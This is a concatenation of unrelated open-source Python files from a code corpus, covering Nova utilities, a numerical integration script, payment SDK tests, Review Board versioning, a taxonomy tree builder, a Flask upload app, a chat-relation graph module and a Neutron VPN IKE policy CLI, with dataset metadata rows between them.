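# 10-byte file containing '0123456789', requesting the last 4 bytes returns
# those bytes plus the count of bytes still in front of the read position:
#
#   >>> last_bytes(open('ten_byte_file', 'rb'), 4)
#   ('6789', 6)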
def metadata_to_dict(metadata):
result = {}
for item in metadata:
if not item.get('deleted'):
result[item['key']] = item['value']
return result
def dict_to_metadata(metadata):
result = []
for key, value in metadata.iteritems():
result.append(dict(key=key, value=value))
return result
def instance_meta(instance):
if isinstance(instance['metadata'], dict):
return instance['metadata']
else:
return metadata_to_dict(instance['metadata'])
def instance_sys_meta(instance):
if not instance.get('system_metadata'):
return {}
if isinstance(instance['system_metadata'], dict):
return instance['system_metadata']
else:
return metadata_to_dict(instance['system_metadata'])
def get_wrapped_function(function):
"""Get the method at the bottom of a stack of decorators."""
if not hasattr(function, 'func_closure') or not function.func_closure:
return function
def _get_wrapped_function(function):
if not hasattr(function, 'func_closure') or not function.func_closure:
return None
for closure in function.func_closure:
func = closure.cell_contents
deeper_func = _get_wrapped_function(func)
if deeper_func:
return deeper_func
elif hasattr(closure.cell_contents, '__call__'):
return closure.cell_contents
return _get_wrapped_function(function)
def expects_func_args(*args):
def _decorator_checker(dec):
@functools.wraps(dec)
def _decorator(f):
base_f = get_wrapped_function(f)
arg_names, a, kw, _default = inspect.getargspec(base_f)
if a or kw or set(args) <= set(arg_names):
# NOTE (ndipanov): We can't really tell if correct stuff will
# be passed if it's a function with *args or **kwargs so
# we still carry on and hope for the best
return dec(f)
else:
raise TypeError("Decorated function %(f_name)s does not "
"have the arguments expected by the "
"decorator %(d_name)s" %
{'f_name': base_f.__name__,
'd_name': dec.__name__})
return _decorator
return _decorator_checker
class ExceptionHelper(object):
"""Class to wrap another and translate the ClientExceptions raised by its
function calls to the actual ones.
"""
def __init__(self, target):
self._target = target
def __getattr__(self, name):
func = getattr(self._target, name)
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except messaging.ExpectedException as e:
raise (e.exc_info[1], None, e.exc_info[2])
return wrapper
def check_string_length(value, name=None, min_length=0, max_length=None):
"""Check the length of specified string
:param value: the value of the string
:param name: the name of the string
:param min_length: the min_length of the string
:param max_length: the max_length of the string
"""
if not isinstance(value, six.string_types):
if name is None:
msg = _("The input is not a string or unicode")
else:
msg = _("%s is not a string or unicode") % name
raise exception.InvalidInput(message=msg)
if name is None:
name = value
if len(value) < min_length:
msg = _("%(name)s has a minimum character requirement of "
"%(min_length)s.") % {'name': name, 'min_length': min_length}
raise exception.InvalidInput(message=msg)
if max_length and len(value) > max_length:
msg = _("%(name)s has more than %(max_length)s "
"characters.") % {'name': name, 'max_length': max_length}
raise exception.InvalidInput(message=msg)
def validate_integer(value, name, min_value=None, max_value=None):
"""Make sure that value is a valid integer, potentially within range."""
try:
value = int(str(value))
except (ValueError, UnicodeEncodeError):
msg = _('%(value_name)s must be an integer')
raise exception.InvalidInput(reason=(
msg % {'value_name': name}))
if min_value is not None:
if value < min_value:
msg = _('%(value_name)s must be >= %(min_value)d')
raise exception.InvalidInput(
reason=(msg % {'value_name': name,
'min_value': min_value}))
if max_value is not None:
if value > max_value:
msg = _('%(value_name)s must be <= %(max_value)d')
raise exception.InvalidInput(
reason=(
msg % {'value_name': name,
'max_value': max_value})
)
return value
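# Illustrative usage (editor's sketch): valid input is returned as an int,
# anything else raises InvalidInput naming the offending parameter.
#
#   >>> validate_integer('10', 'vcpus', min_value=1, max_value=32)
#   10
#   >>> validate_integer('many', 'vcpus')      # raises exception.InvalidInput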
def spawn_n(func, *args, **kwargs):
"""Passthrough method for eventlet.spawn_n.
This utility exists so that it can be stubbed for testing without
interfering with the service spawns.
"""
eventlet.spawn_n(func, *args, **kwargs)
def is_none_string(val):
"""Check if a string represents a None value.
"""
if not isinstance(val, six.string_types):
return False
return val.lower() == 'none'
def convert_version_to_int(version):
try:
if isinstance(version, six.string_types):
version = convert_version_to_tuple(version)
if isinstance(version, tuple):
return reduce(lambda x, y: (x * 1000) + y, version)
except Exception:
msg = _("Hypervisor version %s is invalid.") % version
raise exception.NovaException(msg)
def convert_version_to_str(version_int):
version_numbers = []
factor = 1000
while version_int != 0:
version_number = version_int - (version_int // factor * factor)
version_numbers.insert(0, str(version_number))
version_int = version_int / factor
return reduce(lambda x, y: "%s.%s" % (x, y), version_numbers)
def convert_version_to_tuple(version_str):
return tuple(int(part) for part in version_str.split('.'))
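# Illustrative round trip (editor's sketch): versions are packed base-1000,
# so '1.2.3' becomes ((1 * 1000) + 2) * 1000 + 3 and converts back losslessly.
#
#   >>> convert_version_to_int('1.2.3')
#   1002003
#   >>> convert_version_to_str(1002003)
#   '1.2.3'
#   >>> convert_version_to_tuple('1.2.3')
#   (1, 2, 3)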
def is_neutron():
global _IS_NEUTRON
if _IS_NEUTRON is not None:
return _IS_NEUTRON
try:
# compatibility with Folsom/Grizzly configs
cls_name = CONF.network_api_class
if cls_name == 'nova.network.quantumv2.api.API':
cls_name = 'nova.network.neutronv2.api.API'
from nova.network.neutronv2 import api as neutron_api
_IS_NEUTRON = issubclass(importutils.import_class(cls_name),
neutron_api.API)
except ImportError:
_IS_NEUTRON = False
return _IS_NEUTRON
def is_auto_disk_config_disabled(auto_disk_config_raw):
auto_disk_config_disabled = False
if auto_disk_config_raw is not None:
adc_lowered = auto_disk_config_raw.strip().lower()
if adc_lowered == "disabled":
auto_disk_config_disabled = True
return auto_disk_config_disabled
def get_auto_disk_config_from_instance(instance=None, sys_meta=None):
if sys_meta is None:
sys_meta = instance_sys_meta(instance)
return sys_meta.get("image_auto_disk_config")
def get_auto_disk_config_from_image_props(image_properties):
return image_properties.get("auto_disk_config")
def get_system_metadata_from_image(image_meta, flavor=None):
system_meta = {}
prefix_format = SM_IMAGE_PROP_PREFIX + '%s'
for key, value in image_meta.get('properties', {}).iteritems():
new_value = safe_truncate(unicode(value), 255)
system_meta[prefix_format % key] = new_value
for key in SM_INHERITABLE_KEYS:
value = image_meta.get(key)
if key == 'min_disk' and flavor:
if image_meta.get('disk_format') == 'vhd':
value = flavor['root_gb']
else:
value = max(value, flavor['root_gb'])
if value is None:
continue
system_meta[prefix_format % key] = value
return system_meta
def get_image_from_system_metadata(system_meta):
image_meta = {}
properties = {}
if not isinstance(system_meta, dict):
system_meta = metadata_to_dict(system_meta)
for key, value in system_meta.iteritems():
if value is None:
continue
# NOTE(xqueralt): Not sure this has to inherit all the properties or
# just the ones we need. Leaving it for now to keep the old behaviour.
if key.startswith(SM_IMAGE_PROP_PREFIX):
key = key[len(SM_IMAGE_PROP_PREFIX):]
if key in SM_INHERITABLE_KEYS:
image_meta[key] = value
else:
# Skip properties that are non-inheritable
if key in CONF.non_inheritable_image_properties:
continue
properties[key] = value
image_meta['properties'] = properties
return image_meta
def get_hash_str(base_str):
"""returns string that represents hash of base_str (in hex format)."""
return hashlib.md5(base_str).hexdigest()
if hasattr(hmac, 'compare_digest'):
constant_time_compare = hmac.compare_digest
else:
def constant_time_compare(first, second):
"""Returns True if both string inputs are equal, otherwise False.
This function should take a constant amount of time regardless of
how many characters in the strings match.
"""
if len(first) != len(second):
return False
result = 0
for x, y in zip(first, second):
result |= ord(x) ^ ord(y)
return result == 0
def filter_and_format_resource_metadata(resource_type, resource_list,
search_filts, metadata_type=None):
"""Get all metadata for a list of resources after filtering.
Search_filts is a list of dictionaries, where the values in the dictionary
can be string or regex string, or a list of strings/regex strings.
Let's call a dict a 'filter block' and an item in the dict
a 'filter'. A tag is returned if it matches ALL the filters in
a filter block. If more than one values are specified for a
filter, a tag is returned if it matches ATLEAST ONE value of the filter. If
more than one filter blocks are specified, the tag should match ALL the
filter blocks.
For example:
search_filts = [{'key': ['key1', 'key2'], 'value': 'val1'},
{'value': 'val2'}]
The filter translates to 'match any tag for which':
((key=key1 AND value=val1) OR (key=key2 AND value=val1)) AND
(value=val2)
This example filter will never match a tag.
:param resource_type: The resource type as a string, e.g. 'instance'
:param resource_list: List of resource objects
:param search_filts: Filters to filter metadata to be returned. Can be
dict (e.g. {'key': 'env', 'value': 'prod'}, or a list of dicts
(e.g. [{'key': 'env'}, {'value': 'beta'}]. Note that the values
of the dict can be regular expressions.
:param metadata_type: Provided to search for a specific metadata type
(e.g. 'system_metadata')
:returns: List of dicts where each dict is of the form {'key':
'somekey', 'value': 'somevalue', 'instance_id':
'some-instance-uuid-aaa'} if resource_type is 'instance'.
"""
if isinstance(search_filts, dict):
search_filts = [search_filts]
def _get_id(resource):
if resource_type == 'instance':
return resource.get('uuid')
def _match_any(pattern_list, string):
if isinstance(pattern_list, str):
pattern_list = [pattern_list]
return any([re.match(pattern, string)
for pattern in pattern_list])
def _filter_metadata(resource, search_filt, input_metadata):
ids = search_filt.get('resource_id', [])
keys_filter = search_filt.get('key', [])
values_filter = search_filt.get('value', [])
output_metadata = {}
if ids and _get_id(resource) not in ids:
return {}
for k, v in six.iteritems(input_metadata):
# Both keys and value defined -- AND
if (keys_filter and values_filter and
not _match_any(keys_filter, k) and
not _match_any(values_filter, v)):
continue
# Only keys or value is defined
elif ((keys_filter and not _match_any(keys_filter, k)) or
(values_filter and not _match_any(values_filter, v))):
continue
output_metadata[k] = v
return output_metadata
formatted_metadata_list = []
for res in resource_list:
if resource_type == 'instance':
# NOTE(rushiagr): metadata_type should be 'metadata' or
# 'system_metadata' if resource_type is instance. Defaulting to
# 'metadata' if not specified.
if metadata_type is None:
metadata_type = 'metadata'
metadata = res.get(metadata_type, {})
for filt in search_filts:
# By chaining the input to the output, the filters are
# ANDed together
metadata = _filter_metadata(res, filt, metadata)
for (k, v) in metadata.items():
formatted_metadata_list.append({'key': k, 'value': v,
'%s_id' % resource_type: _get_id(res)})
return formatted_metadata_list
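# Worked example (editor's sketch, hypothetical data): given
#   insts = [{'uuid': 'uuid-1', 'metadata': {'env': 'prod', 'tier': 'web'}},
#            {'uuid': 'uuid-2', 'metadata': {'env': 'dev'}}]
# the call
#   filter_and_format_resource_metadata('instance', insts,
#                                       {'key': 'env', 'value': 'prod'})
# returns a single entry {'key': 'env', 'value': 'prod',
# 'instance_id': 'uuid-1'}: 'tier' fails the key filter and 'dev' fails the
# value filter.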
def safe_truncate(value, length):
"""Safely truncates unicode strings such that their encoded length is
no greater than the length provided.
"""
b_value = encodeutils.safe_encode(value)[:length]
# NOTE(chaochin) UTF-8 character byte size varies from 1 to 6. If
# truncating a long byte string to 255, the last character may be
# cut in the middle, so that UnicodeDecodeError will occur when
# converting it back to unicode.
decode_ok = False
while not decode_ok:
try:
u_value = encodeutils.safe_decode(b_value)
decode_ok = True
except UnicodeDecodeError:
b_value = b_value[:-1]
return u_value
| apache-2.0 | -4,700,980,457,302,506,000 | 31.84065 | 79 | 0.599025 | false |
Drapegnik/bsu | numerical-analysis/sem4/lab2/scripts.py | 1 | 1076 | A = -2.0
B = 2.0
eps = [0.5 * pow(10, -1 * i) for i in range(3, 8, 2)]
def f(x):
return float(x * (3 ** x + 1) ** (-1))
def rect(h):
int_sum = 0
x = A + h / 2.0
while x < B:
int_sum += f(x)
x += h
return h * int_sum
def trap(h):
int_sum = 0
x = A
while x < B:
int_sum += h * (f(x) + f(x + h))
x += h
return 0.5 * int_sum
def simp(h):
int_sum1 = 0
int_sum2 = 0
x = A + h
while x < B:
int_sum1 += f(x)
x += 2 * h
x = A + 2 * h
while x < B:
int_sum2 += f(x)
x += 2 * h
return h / 3 * (f(A) + f(B) + 4 * int_sum1 + 2 * int_sum2)
def solve(method, h, k, eps):
while True:
h /= 2
sum_h, sum_h_half = method(h), method(h / 2)
rich = (2 ** k * sum_h_half - sum_h) / (2 ** k - 1)
if abs(sum_h - sum_h_half) <= eps:
break
print '{}:\t{}\t\t{}\t{}\t{}'.format(method.__name__, eps, h, sum_h, rich)
map(lambda x: map(solve, (x, x, x), (0.001, 0.001, 0.001), (2, 2, 4), eps), (rect, trap, simp))
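# Editor's note (sketch): solve() halves the step until two successive sums
# differ by at most eps and prints the Richardson-extrapolated value
# (2**k * S_{h/2} - S_h) / (2**k - 1). The map() driver above runs each method
# starting from h=0.001 and pairs k = (2, 2, 4) with the three eps values; the
# usual convention would instead pair k with the methods (k=2 for the midpoint
# and trapezoid rules, k=4 for Simpson's rule), e.g.:
#
# for method, k in ((rect, 2), (trap, 2), (simp, 4)):
#     for e in eps:
#         solve(method, 0.001, k, e)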
| mit | 1,965,298,469,731,756,500 | 19.301887 | 95 | 0.412639 | false |
msherry/litle-sdk-for-python-114 | litleSdkPythonTest/functional/TestForceCapture.py | 1 | 2628 | #Copyright (c) 2011-2012 Litle & Co.
#
#Permission is hereby granted, free of charge, to any person
#obtaining a copy of this software and associated documentation
#files (the "Software"), to deal in the Software without
#restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the
#Software is furnished to do so, subject to the following
#conditions:
#
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
#OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
#NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
#WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
#OTHER DEALINGS IN THE SOFTWARE.
import os, sys
lib_path = os.path.abspath('../all')
sys.path.append(lib_path)
from SetupTest import *
import unittest
class TestForceCapture(unittest.TestCase):
def testSimpleForceCaptureWithCard(self):
forcecapture = litleXmlFields.forceCapture()
forcecapture.amount = 106L
forcecapture.orderId = '12344'
forcecapture.orderSource = 'ecommerce'
card = litleXmlFields.cardType()
card.type = 'VI'
card.number = "4100000000000001"
card.expDate = "1210"
forcecapture.card = card
litleXml = litleOnlineRequest(config)
response = litleXml.sendRequest(forcecapture)
self.assertEquals("Approved",response.message)
def testSimpleForceCaptureWithToken(self):
forcecapture = litleXmlFields.forceCapture()
forcecapture.amount = 106L
forcecapture.orderId = '12344'
forcecapture.orderSource = 'ecommerce'
token = litleXmlFields.cardTokenType()
token.type = 'VI'
token.expDate = "1210"
token.litleToken = "123456789101112"
token.cardValidationNum = "555"
forcecapture.token = token
litleXml = litleOnlineRequest(config)
response = litleXml.sendRequest(forcecapture)
self.assertEquals("Approved",response.message)
def suite():
suite = unittest.TestSuite()
suite = unittest.TestLoader().loadTestsFromTestCase(TestForceCapture)
return suite
if __name__ =='__main__':
unittest.main() | mit | -7,517,700,063,915,625,000 | 35.013699 | 73 | 0.707002 | false |
chazy/reviewboard | reviewboard/__init__.py | 1 | 2020 | # The version of Review Board.
#
# This is in the format of:
#
# (Major, Minor, Micro, Patch, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (1, 6, 0, 0, 'final', 0, True)
def get_version_string():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3]:
version += ".%s" % VERSION[3]
if VERSION[4] != 'final':
if VERSION[4] == 'rc':
version += ' RC%s' % VERSION[5]
else:
version += ' %s %s' % (VERSION[4], VERSION[5])
if not is_release():
version += " (dev)"
return version
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3]:
version += ".%s" % VERSION[3]
if VERSION[4] != 'final':
version += '%s%s' % (VERSION[4], VERSION[5])
return version
def is_release():
return VERSION[6]
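# Illustrative values (editor's sketch): with VERSION = (1, 6, 0, 0, 'final', 0, True)
# as above, get_version_string() returns '1.6' and get_package_version() also
# returns '1.6'; a pre-release such as (2, 0, 1, 0, 'rc', 2, False) would yield
# '2.0.1 RC2 (dev)' and '2.0.1rc2' respectively.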
def initialize():
"""Begins initialization of Review Board.
This sets up the logging, generates cache serial numbers, and then
fires an initializing signal that other parts of the codebase can
connect to. This must be called for such features as e-mail notification
to work.
"""
import logging
import os
from django.conf import settings
from djblets.util.misc import generate_cache_serials
from djblets import log
from reviewboard import signals
# This overrides a default django templatetag (url), and we want to make
# sure it will always get loaded in every python instance.
import reviewboard.site.templatetags
# Set up logging.
log.init_logging()
if settings.DEBUG:
logging.debug("Log file for Review Board v%s (PID %s)" %
(get_version_string(), os.getpid()))
# Generate cache serials
generate_cache_serials()
signals.initializing.send(sender=None)
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| mit | 773,339,143,353,341,300 | 22.764706 | 79 | 0.60396 | false |
supertree-toolkit/stk | stk/scripts/tree_from_taxonomy.py | 1 | 5734 | # trees ready for supretree construction.
# Copyright (C) 2015, Jon Hill, Katie Davis
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Jon Hill. [email protected]
import argparse
import copy
import os
import sys
stk_path = os.path.join( os.path.realpath(os.path.dirname(__file__)), os.pardir )
sys.path.insert(0, stk_path)
import supertree_toolkit as stk
import csv
from ete2 import Tree
taxonomy_levels = ['species','subgenus','genus','subfamily','family','superfamily','subsection','section','infraorder','suborder','order','superorder','subclass','class','superclass','subphylum','phylum','superphylum','infrakingdom','subkingdom','kingdom']
tlevels = ['species','genus','subfamily','family','superfamily','infraorder','suborder','order','class','phylum','kingdom']
def main():
# do stuff
parser = argparse.ArgumentParser(
prog="create a tree from a taxonomy file",
description="Create a taxonomic tree",
)
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help="Verbose output: mainly progress reports.",
default=False
)
parser.add_argument(
'top_level',
nargs=1,
help="The top level group to start with, e.g. family"
)
parser.add_argument(
'input_file',
metavar='input_file',
nargs=1,
help="Your taxonomy file"
)
parser.add_argument(
'output_file',
metavar='output_file',
nargs=1,
help="Your new tree file"
)
args = parser.parse_args()
verbose = args.verbose
input_file = args.input_file[0]
output_file = args.output_file[0]
top_level = args.top_level[0]
tree_taxonomy = stk.load_taxonomy(input_file)
new_taxa = tree_taxonomy.keys()
tl_types = []
for tt in tree_taxonomy:
tl_types.append(tree_taxonomy[tt][top_level])
tl_types = _uniquify(tl_types)
print tl_types
levels_to_worry_about = tlevels[0:tlevels.index(top_level)+1]
t = Tree()
nodes = {}
nodes[top_level] = []
for tl in tl_types:
n = t.add_child(name=tl)
nodes[top_level].append({tl:n})
for l in levels_to_worry_about[-2::-1]:
names = []
nodes[l] = []
ci = levels_to_worry_about.index(l)
for tt in tree_taxonomy:
try:
names.append(tree_taxonomy[tt][l])
except KeyError:
pass
names = _uniquify(names)
for n in names:
# find my parent
parent = None
for tt in tree_taxonomy:
try:
if tree_taxonomy[tt][l] == n:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+1]]
level = ci+1
except KeyError:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+2]]
level = ci+2
except KeyError:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+3]]
level = ci+3
except KeyError:
print "ERROR: tried to find some taxonomic info for "+tt+" from tree_taxonomy file/downloaded data and I went two levels up, but failed find any. Looked at:\n"
print "\t"+levels_to_worry_about[ci+1]
print "\t"+levels_to_worry_about[ci+2]
print "\t"+levels_to_worry_about[ci+3]
print "This is the taxonomy info I have for "+tt
print tree_taxonomy[tt]
sys.exit(1)
k = []
for nd in nodes[levels_to_worry_about[level]]:
k.extend(nd.keys())
i = 0
for kk in k:
if kk == parent:
break
i += 1
parent_id = i
break
except KeyError:
pass # no data at this level for this beastie
# find out where to attach it
node_id = nodes[levels_to_worry_about[level]][parent_id][parent]
nd = node_id.add_child(name=n.replace(" ","_"))
nodes[l].append({n:nd})
tree = t.write(format=9)
tree = stk._collapse_nodes(tree)
tree = stk._collapse_nodes(tree)
f = open(output_file, "w")
f.write(tree)
f.close()
def _uniquify(l):
"""
Make a list, l, contain only unique data
"""
keys = {}
for e in l:
keys[e] = 1
return keys.keys()
if __name__ == "__main__":
main()
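# Example invocation (editor's sketch; the file names are hypothetical):
#
#   python tree_from_taxonomy.py family taxonomy.csv family_tree.tre
#
# reads the taxonomy in taxonomy.csv, builds a tree with one clade per family
# and the lower ranks nested inside it, collapses redundant nodes and writes
# the result in newick format to family_tree.tre.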
| gpl-3.0 | 3,513,212,164,983,585,300 | 33.542169 | 256 | 0.509766 | false |
maddyloo/miniBibServer | webapp/flasktest1.py | 1 | 3138 | #!/usr/bin/python
## I got started with the tips and outline from:
## https://beagle.whoi.edu/redmine/projects/ibt/wiki/Deploying_Flask_Apps_with_Apache_and_Mod_WSGI
## Together with that starter kit, the contents of this file and the associated Apache config in
## ./celebratio are enough to get the site going.
import os
from flask import Flask, request, redirect, url_for, send_from_directory, current_app
from werkzeug.utils import secure_filename
## Awesome: this is what logs errors to the main apache error log!
## Uncomment for further debugging
# import logging, sys
# logging.basicConfig(stream=sys.stderr)
## And this turns on a nice debugger that, sadly, doesn't seem to work under WSGI/Apache
# from werkzeug.debug import DebuggedApplication
# application = DebuggedApplication(app, evalex=True)
import ims_legacy
UPLOAD_FOLDER = '/var/www/celebratio/apps/flasktest/ims_celebratio_uploads'
ALLOWED_EXTENSIONS = set(['tex', 'txt'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Only allow .tex and .txt files
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
# Main point of interaction
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
# Save the uploaded file
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return redirect(url_for('uploaded_file', filename=filename))
return '''
<!doctype html>
<title>Upload biography in .tex format</title>
<h1>Upload biography data in .tex format</h1>
<form action="" method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
# Display contents - however, instead of displaying the TeX, we really
# would prefer to display the HTML. There's a slight problem with the URL.
# But if we can display the contents, that's at least something!
@app.route('/uploads/<filename>', methods=['GET', 'POST'])
def uploaded_file(filename):
basename = filename.rsplit('.', 1)[0]
htmlversion = filename.rsplit('.', 1)[0] + ".html"
outfile = open(app.config['UPLOAD_FOLDER'] + "/" + htmlversion,'w')
htmlcontent = "hello"
# print "upload folder: " + app.config['UPLOAD_FOLDER']
htmlcontent = ims_legacy.make_one(app.config['UPLOAD_FOLDER'] + "/" + filename)
outfile.write("<!doctype html><title>Data</title>Input: " + filename + "\nOutput: " + htmlversion + " <br><br> " + htmlcontent)
outfile.close()
# for demo purposes, let's just write the filename to an HTML file
# subsequently we will put content there
return send_from_directory(app.config['UPLOAD_FOLDER'], htmlversion)
if __name__ == '__main__':
"Are we in the __main__ scope? Start test server."
## Set debug=True to debug locally, set debug=False (etc.) for production
#app.run(debug=True)
app.run(host='0.0.0.0',port=5000,debug=False)
| mit | -4,089,402,284,788,163,600 | 38.225 | 131 | 0.683875 | false |
homeworkprod/chatrelater | src/chatrelater/visualization.py | 1 | 1866 | """
chatrelater.visualization
~~~~~~~~~~~~~~~~~~~~~~~~~
Visualize relations between chat partners using GraphViz_ (has to be
installed).
.. _GraphViz: http://www.graphviz.org/
:Copyright: 2007-2021 Jochen Kupperschmidt
:License: MIT, see LICENSE for details.
"""
import math
from typing import List, Tuple
from graphviz import Digraph, Graph
from graphviz.dot import Dot
from .nicknames import Nickname
DEFAULT_FORMAT = 'dot'
DEFAULT_PROGRAM = 'dot'
def generate_dot(
nicknames: List[Nickname],
relations: List[Tuple[Nickname, Nickname, int]],
*,
name: str,
format: str,
program: str,
directed: bool = False,
) -> Dot:
"""Create dot graph representations."""
dot = _create_graph(name, format, program, directed=directed)
_create_nodes(dot, nicknames)
_create_edges(dot, relations)
return dot
def _create_graph(
name: str, format: str, program: str, *, directed: bool
) -> Dot:
attrs = {
'name': name,
'format': format,
'engine': program,
}
if directed:
return Digraph(**attrs)
else:
return Graph(**attrs)
def _create_nodes(dot: Dot, nicknames: List[Nickname]) -> None:
for nickname in nicknames:
dot.node(nickname, label=nickname)
def _create_edges(
dot: Dot, relations: List[Tuple[Nickname, Nickname, int]]
) -> None:
max_count = float(max(rel[2] for rel in relations))
max_width = 4
for nickname1, nickname2, count in sorted(relations, key=lambda x: x[0]):
width = math.ceil(count / max_count * max_width)
dot.edge(nickname1, nickname2, style=f'setlinewidth({width:d})')
def write_file(dot: Dot) -> None:
"""Create a graphics file from the DOT data."""
rendered_filename = dot.render()
print(
f"Wrote {dot.format} output to '{rendered_filename}' using {dot.engine}."
)
| mit | 2,838,336,131,534,534,700 | 22.923077 | 81 | 0.642551 | false |
openstack/python-neutronclient | neutronclient/osc/v2/vpnaas/ikepolicy.py | 1 | 9098 | # Copyright 2017 FUJITSU LIMITED
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from osc_lib.utils import columns as column_util
from oslo_log import log as logging
from neutronclient._i18n import _
from neutronclient.common import utils as nc_utils
from neutronclient.osc import utils as osc_utils
from neutronclient.osc.v2.vpnaas import utils as vpn_utils
LOG = logging.getLogger(__name__)
_attr_map = (
('id', 'ID', column_util.LIST_BOTH),
('name', 'Name', column_util.LIST_BOTH),
('auth_algorithm', 'Authentication Algorithm', column_util.LIST_BOTH),
('encryption_algorithm', 'Encryption Algorithm', column_util.LIST_BOTH),
('ike_version', 'IKE Version', column_util.LIST_BOTH),
('pfs', 'Perfect Forward Secrecy (PFS)', column_util.LIST_BOTH),
('description', 'Description', column_util.LIST_LONG_ONLY),
('phase1_negotiation_mode', 'Phase1 Negotiation Mode',
column_util.LIST_LONG_ONLY),
('tenant_id', 'Project', column_util.LIST_LONG_ONLY),
('lifetime', 'Lifetime', column_util.LIST_LONG_ONLY),
)
def _convert_to_lowercase(string):
return string.lower()
def _get_common_parser(parser):
parser.add_argument(
'--description',
metavar='<description>',
help=_('Description of the IKE policy'))
parser.add_argument(
'--auth-algorithm',
choices=['sha1', 'sha256', 'sha384', 'sha512'],
type=_convert_to_lowercase,
help=_('Authentication algorithm'))
parser.add_argument(
'--encryption-algorithm',
choices=['aes-128', '3des', 'aes-192', 'aes-256'],
type=_convert_to_lowercase,
help=_('Encryption algorithm'))
parser.add_argument(
'--phase1-negotiation-mode',
choices=['main', 'aggressive'],
type=_convert_to_lowercase,
help=_('IKE Phase1 negotiation mode'))
parser.add_argument(
'--ike-version',
choices=['v1', 'v2'],
type=_convert_to_lowercase,
help=_('IKE version for the policy'))
parser.add_argument(
'--pfs',
choices=['group5', 'group2', 'group14'],
type=_convert_to_lowercase,
help=_('Perfect Forward Secrecy'))
parser.add_argument(
'--lifetime',
metavar="units=UNITS,value=VALUE",
type=nc_utils.str2dict_type(optional_keys=['units', 'value']),
help=vpn_utils.lifetime_help("IKE"))
return parser
def _get_common_attrs(client_manager, parsed_args, is_create=True):
attrs = {}
if is_create:
if 'project' in parsed_args and parsed_args.project is not None:
attrs['tenant_id'] = osc_utils.find_project(
client_manager.identity,
parsed_args.project,
parsed_args.project_domain,
).id
if parsed_args.description:
attrs['description'] = parsed_args.description
if parsed_args.auth_algorithm:
attrs['auth_algorithm'] = parsed_args.auth_algorithm
if parsed_args.encryption_algorithm:
attrs['encryption_algorithm'] = parsed_args.encryption_algorithm
if parsed_args.phase1_negotiation_mode:
attrs['phase1_negotiation_mode'] = parsed_args.phase1_negotiation_mode
if parsed_args.ike_version:
attrs['ike_version'] = parsed_args.ike_version
if parsed_args.pfs:
attrs['pfs'] = parsed_args.pfs
if parsed_args.lifetime:
vpn_utils.validate_lifetime_dict(parsed_args.lifetime)
attrs['lifetime'] = parsed_args.lifetime
return attrs
class CreateIKEPolicy(command.ShowOne):
_description = _("Create an IKE policy")
def get_parser(self, prog_name):
parser = super(CreateIKEPolicy, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'name',
metavar='<name>',
help=_('Name of the IKE policy'))
osc_utils.add_project_owner_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager, parsed_args)
if parsed_args.name:
attrs['name'] = str(parsed_args.name)
obj = client.create_ikepolicy({'ikepolicy': attrs})['ikepolicy']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns)
return display_columns, data
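# Example CLI usage (editor's sketch; the exact top-level command name depends
# on how the OSC plugin is registered and is shown here as an assumption):
#
#   openstack vpn ike policy create ikepolicy1 \
#       --auth-algorithm sha256 --encryption-algorithm aes-256 \
#       --ike-version v2 --pfs group14 --lifetime units=seconds,value=7200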
class DeleteIKEPolicy(command.Command):
_description = _("Delete IKE policy (policies)")
def get_parser(self, prog_name):
parser = super(DeleteIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
nargs='+',
help=_('IKE policy to delete (name or ID)'))
return parser
def take_action(self, parsed_args):
